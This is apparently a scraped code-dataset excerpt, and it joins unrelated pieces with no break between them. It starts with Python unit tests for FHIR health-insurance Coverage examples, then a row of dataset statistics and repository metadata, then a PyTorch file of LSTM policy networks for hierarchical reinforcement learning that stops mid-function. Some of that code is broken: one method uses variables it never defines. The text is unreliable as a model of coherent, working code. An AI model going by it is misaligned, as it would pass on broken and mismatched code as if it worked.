self.assertIsNotNone(inst, "Must have instantiated a Coverage instance")
self.implCoverage3(inst)
js = inst.as_json()
self.assertEqual("Coverage", js["resourceType"])
inst2 = coverage.Coverage(js)
self.implCoverage3(inst2)
def implCoverage3(self, inst):
self.assertEqual(inst.id, "7547E")
self.assertEqual(inst.identifier[0].system, "http://ehic.com/insurer/123456789/member")
self.assertEqual(inst.identifier[0].value, "A123456780")
self.assertEqual(inst.meta.tag[0].code, "HTEST")
self.assertEqual(inst.meta.tag[0].display, "test health data")
self.assertEqual(inst.meta.tag[0].system, "http://terminology.hl7.org/CodeSystem/v3-ActReason")
self.assertEqual(inst.period.end.date, FHIRDate("2012-03-17").date)
self.assertEqual(inst.period.end.as_json(), "2012-03-17")
self.assertEqual(inst.relationship.coding[0].code, "self")
self.assertEqual(inst.status, "active")
self.assertEqual(inst.text.div, "<div xmlns=\"http://www.w3.org/1999/xhtml\">A human-readable rendering of the European Health Insurance Card</div>")
self.assertEqual(inst.text.status, "generated")
self.assertEqual(inst.type.coding[0].code, "EHCPOL")
self.assertEqual(inst.type.coding[0].display, "extended healthcare")
self.assertEqual(inst.type.coding[0].system, "http://terminology.hl7.org/CodeSystem/v3-ActCode")
def testCoverage4(self):
inst = self.instantiate_from("coverage-example.json")
self.assertIsNotNone(inst, "Must have instantiated a Coverage instance")
self.implCoverage4(inst)
js = inst.as_json()
self.assertEqual("Coverage", js["resourceType"])
inst2 = coverage.Coverage(js)
self.implCoverage4(inst2)
def implCoverage4(self, inst):
self.assertEqual(inst.class_fhir[0].name, "Corporate Baker's Inc. Local #35")
self.assertEqual(inst.class_fhir[0].type.coding[0].code, "group")
self.assertEqual(inst.class_fhir[0].type.coding[0].system, "http://terminology.hl7.org/CodeSystem/coverage-class")
self.assertEqual(inst.class_fhir[0].value, "CB135")
self.assertEqual(inst.class_fhir[1].name, "Trainee Part-time Benefits")
self.assertEqual(inst.class_fhir[1].type.coding[0].code, "subgroup")
self.assertEqual(inst.class_fhir[1].type.coding[0].system, "http://terminology.hl7.org/CodeSystem/coverage-class")
self.assertEqual(inst.class_fhir[1].value, "123")
self.assertEqual(inst.class_fhir[2].name, "Full Coverage: Medical, Dental, Pharmacy, Vision, EHC")
self.assertEqual(inst.class_fhir[2].type.coding[0].code, "plan")
self.assertEqual(inst.class_fhir[2].type.coding[0].system, "http://terminology.hl7.org/CodeSystem/coverage-class")
self.assertEqual(inst.class_fhir[2].value, "B37FC")
self.assertEqual(inst.class_fhir[3].name, "Includes afterlife benefits")
self.assertEqual(inst.class_fhir[3].type.coding[0].code, "subplan")
self.assertEqual(inst.class_fhir[3].type.coding[0].system, "http://terminology.hl7.org/CodeSystem/coverage-class")
self.assertEqual(inst.class_fhir[3].value, "P7")
self.assertEqual(inst.class_fhir[4].name, "Silver: Family Plan spouse only")
self.assertEqual(inst.class_fhir[4].type.coding[0].code, "class")
self.assertEqual(inst.class_fhir[4].type.coding[0].system, "http://terminology.hl7.org/CodeSystem/coverage-class")
self.assertEqual(inst.class_fhir[4].value, "SILVER")
self.assertEqual(inst.class_fhir[5].name, "Low deductable, max $20 copay")
self.assertEqual(inst.class_fhir[5].type.coding[0].code, "subclass")
self.assertEqual(inst.class_fhir[5].type.coding[0].system, "http://terminology.hl7.org/CodeSystem/coverage-class")
self.assertEqual(inst.class_fhir[5].value, "Tier2")
self.assertEqual(inst.class_fhir[6].type.coding[0].code, "sequence")
self.assertEqual(inst.class_fhir[6].type.coding[0].system, "http://terminology.hl7.org/CodeSystem/coverage-class")
self.assertEqual(inst.class_fhir[6].value, "9")
self.assertEqual(inst.class_fhir[7].type.coding[0].code, "rxid")
self.assertEqual(inst.class_fhir[7].type.coding[0].system, "http://terminology.hl7.org/CodeSystem/coverage-class")
self.assertEqual(inst.class_fhir[7].value, "MDF12345")
self.assertEqual(inst.class_fhir[8].type.coding[0].code, "rxbin")
self.assertEqual(inst.class_fhir[8].type.coding[0].system, "http://terminology.hl7.org/CodeSystem/coverage-class")
self.assertEqual(inst.class_fhir[8].value, "987654")
self.assertEqual(inst.class_fhir[9].type.coding[0].code, "rxgroup")
self.assertEqual(inst.class_fhir[9].type.coding[0].system, "http://terminology.hl7.org/CodeSystem/coverage-class")
self.assertEqual(inst.class_fhir[9].value, "M35PT")
self.assertEqual(inst.dependent, "0")
self.assertEqual(inst.id, "9876B1")
self.assertEqual(inst.identifier[0].system, "http://benefitsinc.com/certificate")
self.assertEqual(inst.identifier[0].value, "12345")
self.assertEqual(inst.meta.tag[0].code, "HTEST")
self.assertEqual(inst.meta.tag[0].display, "test health data")
self.assertEqual(inst.meta.tag[0].system, "http://terminology.hl7.org/CodeSystem/v3-ActReason")
self.assertEqual(inst.period.end.date, FHIRDate("2012-05-23").date)
self.assertEqual(inst.period.end.as_json(), "2012-05-23")
self.assertEqual(inst.period.start.date, FHIRDate("2011-05-23").date)
self.assertEqual(inst.period.start.as_json(), "2011-05-23")
self.assertEqual(inst.relationship.coding[0].code, "self")
self.assertEqual(inst.status, "active")
self.assertEqual(inst.text.div, "<div xmlns=\"http://www.w3.org/1999/xhtml\">A human-readable rendering of the coverage</div>")
self.assertEqual(inst.text.status, "generated")
self.assertEqual(inst.type.coding[0].code, "EHCPOL")
self.assertEqual(inst.type.coding[0].display, "extended healthcare")
self.assertEqual(inst.type.coding[0].system, "http://terminology.hl7.org/CodeSystem/v3-ActCode")
| 62.688442 | 159 | 0.687455 | 1,615 | 12,475 | 5.268731 | 0.133746 | 0.232695 | 0.283582 | 0.135386 | 0.83253 | 0.826302 | 0.779175 | 0.718886 | 0.700435 | 0.595605 | 0 | 0.042796 | 0.151503 | 12,475 | 198 | 160 | 63.005051 | 0.761077 | 0.009539 | 0 | 0.375 | 1 | 0 | 0.235466 | 0.009717 | 0 | 0 | 0 | 0 | 0.772727 | 1 | 0.051136 | false | 0 | 0.034091 | 0 | 0.096591 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
542766ea9af462db5cec6ac0822130ac6acb6200 | 160 | py | Python | conut/__init__.py | yoongun/topological-edge-modes-of-mechanical-lattice | de34dfaa9a71621e95367346583c8ceb0d502c6e | [
"Apache-2.0"
] | 1 | 2022-01-30T16:09:38.000Z | 2022-01-30T16:09:38.000Z | conut/__init__.py | yoongun/topological-edge-mode-of-mechanical-lattice | de34dfaa9a71621e95367346583c8ceb0d502c6e | [
"Apache-2.0"
] | null | null | null | conut/__init__.py | yoongun/topological-edge-mode-of-mechanical-lattice | de34dfaa9a71621e95367346583c8ceb0d502c6e | [
"Apache-2.0"
] | null | null | null | from .mechanical_graphene import MechanicalGraphene
from .mechanical_graphene import MechanicalGrapheneLattice
from .mechanical_graphene import HamiltonianType
| 40 | 58 | 0.90625 | 15 | 160 | 9.466667 | 0.466667 | 0.295775 | 0.464789 | 0.591549 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.075 | 160 | 3 | 59 | 53.333333 | 0.959459 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
584142d9340e66b4fd7fe95a660b3a0a1ed33519 | 100,215 | py | Python | spinup/algos/pytorch/ppo/PolicyNetworks.py | tanmayshankar/spinningup | c70d70a1cc5636fe4f14025e12146f9a92207c7d | [
"MIT"
] | null | null | null | spinup/algos/pytorch/ppo/PolicyNetworks.py | tanmayshankar/spinningup | c70d70a1cc5636fe4f14025e12146f9a92207c7d | [
"MIT"
] | null | null | null | spinup/algos/pytorch/ppo/PolicyNetworks.py | tanmayshankar/spinningup | c70d70a1cc5636fe4f14025e12146f9a92207c7d | [
"MIT"
] | null | null | null | # Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
from headers import *
# Check if CUDA is available, set device to GPU if it is, otherwise use CPU.
use_cuda = torch.cuda.is_available()
device = torch.device("cuda" if use_cuda else "cpu")
# torch.cuda.set_device(torch.device('cuda:1'))
# if use_cuda:
# torch.cuda.set_device(2)
class PolicyNetwork_BaseClass(torch.nn.Module):
def __init__(self):
# Ensures inheriting from torch.nn.Module goes nicely and cleanly.
super(PolicyNetwork_BaseClass, self).__init__()
def sample_action(self, action_probabilities):
# Categorical distribution sampling.
sample_action = torch.distributions.Categorical(probs=action_probabilities).sample().squeeze(0)
return sample_action
def select_greedy_action(self, action_probabilities):
# Select action with max probability for test time.
return action_probabilities.argmax()
# def select_epsilon_greedy_action(self, action_probabilities):
# epsilon = 0.1
# if np.random.random()<epsilon:
# return self.sample_action(action_probabilities)
# else:
# return self.select_greedy_action(action_probabilities)
def select_epsilon_greedy_action(self, action_probabilities, epsilon=0.1):
epsilon = epsilon
whether_greedy = torch.rand(action_probabilities.shape[0]).to(device)
sample_actions = torch.where(whether_greedy<epsilon, self.sample_action(action_probabilities), self.select_greedy_action(action_probabilities))
return sample_actions
class PolicyNetwork(PolicyNetwork_BaseClass):
# REMEMBER, in the Bi-directional model, this is going to be evaluated for log-probabilities alone.
# Forward pass set up for evaluating this already.
# Policy Network inherits from torch.nn.Module.
# Now we overwrite the init, forward functions. And define anything else that we need.
def __init__(self, input_size, hidden_size, output_size, number_subpolicies, number_layers=4, batch_size=1, whether_latentb_input=False):
# Ensures inheriting from torch.nn.Module goes nicely and cleanly.
super(PolicyNetwork, self).__init__()
if whether_latentb_input:
self.input_size = input_size+number_subpolicies+1
else:
self.input_size = input_size+number_subpolicies
self.hidden_size = hidden_size
self.output_size = output_size
self.num_layers = number_layers
self.batch_size = batch_size
# Create LSTM Network.
self.lstm = torch.nn.LSTM(input_size=self.input_size,hidden_size=self.hidden_size,num_layers=self.num_layers)
# Define output layers for the LSTM, and activations for this output layer.
self.output_layer = torch.nn.Linear(self.hidden_size,self.output_size)
self.softmax_layer = torch.nn.Softmax(dim=1)
self.batch_logsoftmax_layer = torch.nn.LogSoftmax(dim=2)
self.batch_softmax_layer = torch.nn.Softmax(dim=2)
def forward(self, input, hidden=None, return_log_probabilities=False):
# The argument hidden_input here is the initial hidden state we want to feed to the LSTM.
# Assume inputs is the trajectory sequence.
# Input Format must be: Sequence_Length x Batch_Size x Input_Size.
format_input = input.view((input.shape[0], self.batch_size, self.input_size))
outputs, hidden = self.lstm(format_input)
# Takes softmax of last output.
if return_log_probabilities:
# Computes log probabilities, needed for loss function and log likelihood.
preprobability_outputs = self.output_layer(outputs)
log_probabilities = self.batch_logsoftmax_layer(preprobability_outputs).squeeze(1)
probabilities = self.batch_softmax_layer(preprobability_outputs).squeeze(1)
return outputs, hidden, log_probabilities, probabilities
else:
# Compute action probabilities for sampling.
softmax_output = self.softmax_layer(self.output_layer(outputs[-1]))
return outputs, hidden, softmax_output
class ContinuousPolicyNetwork(PolicyNetwork_BaseClass):
# REMEMBER, in the Bi-directional model, this is going to be evaluated for log-probabilities alone.
# Forward pass set up for evaluating this already.
# Policy Network inherits from torch.nn.Module.
# Now we overwrite the init, forward functions. And define anything else that we need.
# def __init__(self, input_size, hidden_size, output_size, number_subpolicies, number_layers=4, batch_size=1):
# def __init__(self, input_size, hidden_size, output_size, z_space_size, number_layers=4, batch_size=1, whether_latentb_input=False):
def __init__(self, input_size, hidden_size, output_size, args, number_layers=4, whether_latentb_input=False, zero_z_dim=False, small_init=False):
# Ensures inheriting from torch.nn.Module goes nicely and cleanly.
# super().__init__()
super(ContinuousPolicyNetwork, self).__init__()
self.hidden_size = hidden_size
# The output size here must be mean+variance for each dimension.
# This is output_size*2.
self.args = args
if self.args is None:
self.debug = False
self.latent_z_dimensions = 16
self.dropout = 0.
else:
self.latent_z_dimensions = self.args.z_dimensions
self.dropout = self.args.dropout
self.debug = self.args.debug
self.output_size = output_size
self.num_layers = number_layers
self.batch_size = self.args.batch_size
if whether_latentb_input:
# self.input_size = input_size+self.args.z_dimensions+1
self.input_size = input_size+self.latent_z_dimensions+1
else:
if zero_z_dim:
self.input_size = input_size
else:
# self.input_size = input_size+self.args.z_dimensions
self.input_size = input_size+self.latent_z_dimensions
# Create LSTM Network.
self.lstm = torch.nn.LSTM(input_size=self.input_size,hidden_size=self.hidden_size,num_layers=self.num_layers, dropout=self.dropout)
# Define output layers for the LSTM, and activations for this output layer.
self.mean_output_layer = torch.nn.Linear(self.hidden_size,self.output_size)
self.variances_output_layer = torch.nn.Linear(self.hidden_size, self.output_size)
# # Try initializing the network to something, so that we can escape the stupid constant output business.
if small_init:
for name, param in self.mean_output_layer.named_parameters():
if 'bias' in name:
torch.nn.init.constant_(param, 0.0)
elif 'weight' in name:
torch.nn.init.xavier_normal_(param,gain=0.0001)
self.activation_layer = torch.nn.Tanh()
self.variance_activation_layer = torch.nn.Softplus()
self.variance_activation_bias = 0.
self.variance_factor = 0.01
def forward(self, input, action_sequence, epsilon=0.001, batch_size=None, debugging=False):
# Input is the trajectory sequence of shape: Sequence_Length x 1 x Input_Size.
# Here, we also need the continuous actions as input to evaluate their logprobability / probability.
# format_input = torch.tensor(input).view(input.shape[0], self.batch_size, self.input_size).float().to(device)
if batch_size is None:
batch_size = self.batch_size
format_input = input.view((input.shape[0], batch_size, self.input_size))
hidden = None
if isinstance(action_sequence,np.ndarray):
format_action_seq = torch.from_numpy(action_sequence).to(device).float().view(action_sequence.shape[0], batch_size, self.output_size)
else:
format_action_seq = action_sequence.view(action_sequence.shape[0], batch_size, self.output_size)
# format_action_seq = torch.from_numpy(action_sequence).to(device).float().view(action_sequence.shape[0],1,self.output_size)
lstm_outputs, hidden = self.lstm(format_input)
# Predict Gaussian means and variances.
if self.args.mean_nonlinearity:
mean_outputs = self.activation_layer(self.mean_output_layer(lstm_outputs))
else:
mean_outputs = self.mean_output_layer(lstm_outputs)
variance_outputs = (self.variance_activation_layer(self.variances_output_layer(lstm_outputs))+self.variance_activation_bias)
# variance_outputs = self.variance_factor*(self.variance_activation_layer(self.variances_output_layer(lstm_outputs))+self.variance_activation_bias) + epsilon
# Remember, because of Pytorch's dynamic construction, this distribution can have it's own batch size.
# It doesn't matter if batch sizes changes over different forward passes of the LSTM, because we're only going
# to evaluate this distribution (instance)'s log probability with the same sequence length.
# if debugging:
# embed()
covariance_matrix = torch.diag_embed(variance_outputs)
# Executing distribution creation on CPU and then copying back to GPU.
dist = torch.distributions.MultivariateNormal(mean_outputs.cpu(), covariance_matrix.cpu())
log_probabilities = dist.log_prob(format_action_seq.cpu()).to(device)
# dist = torch.distributions.MultivariateNormal(mean_outputs, covariance_matrix)
# log_probabilities = dist.log_prob(format_action_seq)
# log_probabilities = torch.distributions.MultivariateNormal(mean_outputs, torch.diag_embed(variance_outputs)).log_prob(format_action_seq)
entropy = dist.entropy()
if self.args.debug:
print("Embedding in the policy network.")
embed()
return log_probabilities, entropy
# @gpu_profile
def get_actions(self, input, greedy=False, batch_size=None):
if batch_size is None:
batch_size = self.batch_size
format_input = input.view((input.shape[0], batch_size, self.input_size))
hidden = None
lstm_outputs, hidden = self.lstm(format_input)
# Predict Gaussian means and variances.
if self.args.mean_nonlinearity:
mean_outputs = self.activation_layer(self.mean_output_layer(lstm_outputs))
else:
mean_outputs = self.mean_output_layer(lstm_outputs)
variance_outputs = (self.variance_activation_layer(self.variances_output_layer(lstm_outputs))+self.variance_activation_bias)
if greedy:
return mean_outputs
else:
# Remember, because of Pytorch's dynamic construction, this distribution can have it's own batch size.
# It doesn't matter if batch sizes changes over different forward passes of the LSTM, because we're only going
# to evaluate this distribution (instance)'s log probability with the same sequence length.
dist = torch.distributions.MultivariateNormal(mean_outputs, torch.diag_embed(variance_outputs))
return dist.sample()
def reparameterized_get_actions(self, input, greedy=False, action_epsilon=0.):
format_input = input.view((input.shape[0], self.batch_size, self.input_size))
hidden = None
lstm_outputs, hidden = self.lstm(format_input)
# Predict Gaussian means and variances.
if self.args.mean_nonlinearity:
mean_outputs = self.activation_layer(self.mean_output_layer(lstm_outputs))
else:
mean_outputs = self.mean_output_layer(lstm_outputs)
variance_outputs = (self.variance_activation_layer(self.variances_output_layer(lstm_outputs))+self.variance_activation_bias)
noise = torch.randn_like(variance_outputs)
if greedy:
action = mean_outputs
else:
# Instead of *sampling* the action from a distribution, construct using mu + sig * eps (random noise).
action = mean_outputs + variance_outputs * noise
return action
def incremental_reparam_get_actions(self, input, greedy=False, action_epsilon=0., hidden=None):
# Input should be a single timestep input here.
format_input = input.view((input.shape[0], self.batch_size, self.input_size))
# Instead of feeding in entire input sequence, we are feeding in current timestep input and previous hidden state.
lstm_outputs, hidden = self.lstm(format_input, hidden)
# Predict Gaussian means and variances.
if self.args.mean_nonlinearity:
mean_outputs = self.activation_layer(self.mean_output_layer(lstm_outputs))
else:
mean_outputs = self.mean_output_layer(lstm_outputs)
variance_outputs = (self.variance_activation_layer(self.variances_output_layer(lstm_outputs))+self.variance_activation_bias)
noise = torch.randn_like(variance_outputs)
if greedy:
action = mean_outputs
else:
# Instead of *sampling* the action from a distribution, construct using mu + sig * eps (random noise).
action = mean_outputs + variance_outputs * noise
return action, hidden
def get_regularization_kl(self, input_z1, input_z2):
# Input is the trajectory sequence of shape: Sequence_Length x 1 x Input_Size.
# Here, we also need the continuous actions as input to evaluate their logprobability / probability.
format_input_z1 = input_z1.view(input_z1.shape[0], self.batch_size, self.input_size)
format_input_z2 = input_z2.view(input_z2.shape[0], self.batch_size, self.input_size)
hidden = None
# format_action_seq = torch.from_numpy(action_sequence).to(device).float().view(action_sequence.shape[0],1,self.output_size)
lstm_outputs_z1, _ = self.lstm(format_input_z1)
# Reset hidden?
lstm_outputs_z2, _ = self.lstm(format_input_z2)
# Predict Gaussian means and variances.
if self.args.mean_nonlinearity:
mean_outputs_z1 = self.activation_layer(self.mean_output_layer(lstm_outputs_z1))
mean_outputs_z2 = self.activation_layer(self.mean_output_layer(lstm_outputs_z2))
else:
mean_outputs_z1 = self.mean_output_layer(lstm_outputs_z1)
mean_outputs_z2 = self.mean_output_layer(lstm_outputs_z2)
variance_outputs_z1 = self.variance_activation_layer(self.variances_output_layer(lstm_outputs_z1))+self.variance_activation_bias
variance_outputs_z2 = self.variance_activation_layer(self.variances_output_layer(lstm_outputs_z2))+self.variance_activation_bias
dist_z1 = torch.distributions.MultivariateNormal(mean_outputs_z1, torch.diag_embed(variance_outputs_z1))
dist_z2 = torch.distributions.MultivariateNormal(mean_outputs_z2, torch.diag_embed(variance_outputs_z2))
kl_divergence = torch.distributions.kl_divergence(dist_z1, dist_z2)
return kl_divergence
class LatentPolicyNetwork(PolicyNetwork_BaseClass):
# REMEMBER, in the Bi-directional Information model, this is going to be evaluated for log-probabilities alone.
# THIS IS STILL A SINGLE DIRECTION LSTM!!
# This still needs to be written separately from the normal sub-policy network(s) because it also requires termination probabilities.
# Must change forward pass back to using lstm() directly on the entire sequence rather than iterating.
# Now we have the whole input sequence beforehand.
# Policy Network inherits from torch.nn.Module.
# Now we overwrite the init, forward functions. And define anything else that we need.
def __init__(self, input_size, hidden_size, number_subpolicies, number_layers=4, b_exploration_bias=0., batch_size=1):
# Ensures inheriting from torch.nn.Module goes nicely and cleanly.
# super().__init__()
super(LatentPolicyNetwork, self).__init__()
# Input size is actually input_size + number_subpolicies +1
self.input_size = input_size+number_subpolicies+1
self.offset_for_z = input_size+1
self.hidden_size = hidden_size
self.number_subpolicies = number_subpolicies
self.output_size = number_subpolicies
self.num_layers = number_layers
self.b_exploration_bias = b_exploration_bias
self.batch_size = batch_size
# Define LSTM.
self.lstm = torch.nn.LSTM(input_size=self.input_size,hidden_size=self.hidden_size,num_layers=self.num_layers).to(device)
# # Try initializing the network to something, so that we can escape the stupid constant output business.
for name, param in self.lstm.named_parameters():
if 'bias' in name:
torch.nn.init.constant_(param, 0.0)
elif 'weight' in name:
torch.nn.init.xavier_normal_(param,gain=5)
# Transform to output space - Latent z and Latent b.
self.subpolicy_output_layer = torch.nn.Linear(self.hidden_size,self.output_size)
self.termination_output_layer = torch.nn.Linear(self.hidden_size,2)
# Sigmoid and Softmax activation functions for Bernoulli termination probability and latent z selection .
self.batch_softmax_layer = torch.nn.Softmax(dim=2)
self.batch_logsoftmax_layer = torch.nn.LogSoftmax(dim=2)
def forward(self, input):
# Input Format must be: Sequence_Length x 1 x Input_Size.
format_input = input.view((input.shape[0], self.batch_size, self.input_size))
hidden = None
outputs, hidden = self.lstm(format_input)
latent_z_preprobabilities = self.subpolicy_output_layer(outputs)
latent_b_preprobabilities = self.termination_output_layer(outputs) + self.b_exploration_bias
latent_z_probabilities = self.batch_softmax_layer(latent_z_preprobabilities).squeeze(1)
latent_b_probabilities = self.batch_softmax_layer(latent_b_preprobabilities).squeeze(1)
latent_z_logprobabilities = self.batch_logsoftmax_layer(latent_z_preprobabilities).squeeze(1)
latent_b_logprobabilities = self.batch_logsoftmax_layer(latent_b_preprobabilities).squeeze(1)
# Return log probabilities.
return latent_z_logprobabilities, latent_b_logprobabilities, latent_b_probabilities, latent_z_probabilities
def get_actions(self, input, greedy=False):
# Input Format must be: Sequence_Length x 1 x Input_Size.
format_input = input.view((input.shape[0], self.batch_size, self.input_size))
hidden = None
outputs, hidden = self.lstm(format_input)
latent_z_preprobabilities = self.subpolicy_output_layer(outputs)
latent_b_preprobabilities = self.termination_output_layer(outputs) + self.b_exploration_bias
latent_z_probabilities = self.batch_softmax_layer(latent_z_preprobabilities).squeeze(1)
latent_b_probabilities = self.batch_softmax_layer(latent_b_preprobabilities).squeeze(1)
if greedy==True:
selected_b = self.select_greedy_action(latent_b_probabilities)
selected_z = self.select_greedy_action(latent_z_probabilities)
else:
selected_b = self.sample_action(latent_b_probabilities)
selected_z = self.sample_action(latent_z_probabilities)
return selected_b, selected_z
def select_greedy_action(self, action_probabilities):
# Select action with max probability for test time.
# NEED TO USE DIMENSION OF ARGMAX.
return action_probabilities.argmax(dim=-1)
class ContinuousLatentPolicyNetwork(PolicyNetwork_BaseClass):
# def __init__(self, input_size, hidden_size, z_dimensions, number_layers=4, b_exploration_bias=0., batch_size=1):
def __init__(self, input_size, hidden_size, args, number_layers=4):
# Ensures inheriting from torch.nn.Module goes nicely and cleanly.
# super().__init__()
super(ContinuousLatentPolicyNetwork, self).__init__()
self.args = args
# Input size is actually input_size + number_subpolicies +1
self.input_size = input_size+self.args.z_dimensions+1
self.offset_for_z = input_size+1
self.hidden_size = hidden_size
# self.number_subpolicies = number_subpolicies
self.output_size = self.args.z_dimensions
self.num_layers = number_layers
self.b_exploration_bias = self.args.b_exploration_bias
self.batch_size = self.args.batch_size
# Define LSTM.
self.lstm = torch.nn.LSTM(input_size=self.input_size,hidden_size=self.hidden_size,num_layers=self.num_layers, dropout=self.args.dropout).to(device)
# Transform to output space - Latent z and Latent b.
# self.subpolicy_output_layer = torch.nn.Linear(self.hidden_size,self.output_size)
self.termination_output_layer = torch.nn.Linear(self.hidden_size,2)
# Sigmoid and Softmax activation functions for Bernoulli termination probability and latent z selection .
self.batch_softmax_layer = torch.nn.Softmax(dim=2)
self.batch_logsoftmax_layer = torch.nn.LogSoftmax(dim=2)
# Define output layers for the LSTM, and activations for this output layer.
self.mean_output_layer = torch.nn.Linear(self.hidden_size,self.output_size)
self.variances_output_layer = torch.nn.Linear(self.hidden_size, self.output_size)
self.activation_layer = torch.nn.Tanh()
self.variance_activation_layer = torch.nn.Softplus()
self.variance_activation_bias = 0.
self.variance_factor = 0.01
# # # Try initializing the network to something, so that we can escape the stupid constant output business.
for name, param in self.lstm.named_parameters():
if 'bias' in name:
torch.nn.init.constant_(param, 0.001)
elif 'weight' in name:
torch.nn.init.xavier_normal_(param,gain=5)
# Also initializing mean_output_layer to something large...
for name, param in self.mean_output_layer.named_parameters():
if 'bias' in name:
torch.nn.init.constant_(param, 0.)
elif 'weight' in name:
torch.nn.init.xavier_normal_(param,gain=2)
def forward(self, input, epsilon=0.001):
# Input Format must be: Sequence_Length x 1 x Input_Size.
format_input = input.view((input.shape[0], self.batch_size, self.input_size))
hidden = None
outputs, hidden = self.lstm(format_input)
latent_b_preprobabilities = self.termination_output_layer(outputs)
latent_b_probabilities = self.batch_softmax_layer(latent_b_preprobabilities).squeeze(1)
latent_b_logprobabilities = self.batch_logsoftmax_layer(latent_b_preprobabilities).squeeze(1)
# Predict Gaussian means and variances.
if self.args.mean_nonlinearity:
mean_outputs = self.activation_layer(self.mean_output_layer(outputs))
else:
mean_outputs = self.mean_output_layer(outputs)
variance_outputs = self.variance_factor*(self.variance_activation_layer(self.variances_output_layer(outputs))+self.variance_activation_bias) + epsilon
# This should be a SET of distributions.
self.dists = torch.distributions.MultivariateNormal(mean_outputs, torch.diag_embed(variance_outputs))
if self.args.debug:
print("Embedding in Latent Policy.")
embed()
# Return log probabilities.
return latent_b_logprobabilities, latent_b_probabilities, self.dists
def get_actions(self, input, greedy=False, epsilon=0.001):
format_input = input.view((input.shape[0], self.batch_size, self.input_size))
hidden = None
outputs, hidden = self.lstm(format_input)
latent_b_preprobabilities = self.termination_output_layer(outputs) + self.b_exploration_bias
latent_b_probabilities = self.batch_softmax_layer(latent_b_preprobabilities).squeeze(1)
# Predict Gaussian means and variances.
if self.args.mean_nonlinearity:
mean_outputs = self.activation_layer(self.mean_output_layer(outputs))
else:
mean_outputs = self.mean_output_layer(outputs)
# We should be multiply by self.variance_factor.
variance_outputs = self.variance_factor*(self.variance_activation_layer(self.variances_output_layer(outputs))+self.variance_activation_bias) + epsilon
# This should be a SET of distributions.
self.dists = torch.distributions.MultivariateNormal(mean_outputs, torch.diag_embed(variance_outputs))
if greedy==True:
selected_b = self.select_greedy_action(latent_b_probabilities)
selected_z = mean_outputs
else:
# selected_b = self.sample_action(latent_b_probabilities)
selected_b = self.select_greedy_action(latent_b_probabilities)
selected_z = self.dists.sample()
return selected_b, selected_z
def incremental_reparam_get_actions(self, input, greedy=False, action_epsilon=0.001, hidden=None, previous_z=None):
format_input = input.view((input.shape[0], self.batch_size, self.input_size))
outputs, hidden = self.lstm(format_input, hidden)
latent_b_preprobabilities = self.termination_output_layer(outputs)
latent_b_probabilities = self.batch_softmax_layer(latent_b_preprobabilities).squeeze(1)
# Greedily select b.
selected_b = self.select_greedy_action(latent_b_probabilities)
# Predict Gaussian means and variances.
if self.args.mean_nonlinearity:
mean_outputs = self.activation_layer(self.mean_output_layer(outputs))
else:
mean_outputs = self.mean_output_layer(outputs)
# We should be multiply by self.variance_factor.
variance_outputs = self.variance_factor*(self.variance_activation_layer(self.variances_output_layer(outputs))+self.variance_activation_bias) + action_epsilon
noise = torch.randn_like(variance_outputs)
if greedy:
selected_z = mean_outputs
else:
# Instead of *sampling* the action from a distribution, construct using mu + sig * eps (random noise).
selected_z = mean_outputs + variance_outputs * noise
# If single input and previous_Z is None, this is the first timestep. So set b to 1, and don't do anything to z.
if input.shape[0]==1 and previous_z is None:
selected_b[0] = 1
# If previous_Z is not None, this is not the first timestep, so don't do anything to z. If b is 0, use previous.
elif input.shape[0]==1 and previous_z is not None:
if selected_b==0:
selected_z = previous_z
elif input.shape[0]>1:
# Now modify z's as per New Z Selection.
# Set initial b to 1.
selected_b[0] = 1
# Initial z is already trivially set.
for t in range(1,input.shape[0]):
# If b_t==0, just use previous z.
# If b_t==1, sample new z. Here, we've cloned this from sampled_z's, so there's no need to do anything.
if selected_b[t]==0:
selected_z[t] = selected_z[t-1]
return selected_z, selected_b, hidden
def reparam_get_actions(self, input, greedy=False, action_epsilon=0.001, hidden=None):
# Wraps incremental
# MUST MODIFY INCREMENTAL ONE TO HANDLE NEW_Z_SELECTION (i.e. only choose new one if b is 1....)
# Set initial b to 1.
sampled_b[0] = 1
# Initial z is already trivially set.
for t in range(1,input.shape[0]):
# If b_t==0, just use previous z.
# If b_t==1, sample new z. Here, we've cloned this from sampled_z's, so there's no need to do anything.
if sampled_b[t]==0:
sampled_z_index[t] = sampled_z_index[t-1]
def select_greedy_action(self, action_probabilities):
# Select action with max probability for test time.
# NEED TO USE DIMENSION OF ARGMAX.
return action_probabilities.argmax(dim=-1)
class ContinuousLatentPolicyNetwork_ConstrainedBPrior(ContinuousLatentPolicyNetwork):
def __init__(self, input_size, hidden_size, args, number_layers=4):
# Ensures inheriting from torch.nn.Module goes nicely and cleanly.
super(ContinuousLatentPolicyNetwork_ConstrainedBPrior, self).__init__(input_size, hidden_size, args, number_layers)
# We can inherit the forward function from the above class... we just need to modify get actions.
self.min_skill_time = 12
self.max_skill_time = 16
def get_prior_value(self, elapsed_t, max_limit=5):
skill_time_limit = max_limit-1
if self.args.data=='MIME' or self.args.data=='Roboturk' or self.args.data=='OrigRoboturk' or self.args.data=='FullRoboturk' or self.args.data=='Mocap':
# If allowing variable skill length, set length for this sample.
if self.args.var_skill_length:
# Choose length of 12-16 with certain probabilities.
lens = np.array([12,13,14,15,16])
# probabilities = np.array([0.1,0.2,0.4,0.2,0.1])
prob_biases = np.array([[0.8,0.],[0.4,0.],[0.,0.],[0.,0.4]])
max_limit = 16
skill_time_limit = 12
else:
max_limit = 20
skill_time_limit = max_limit-1
prior_value = torch.zeros((1,2)).to(device).float()
# If at or over hard limit.
if elapsed_t>=max_limit:
prior_value[0,1]=1.
# If at or more than typical, less than hard limit:
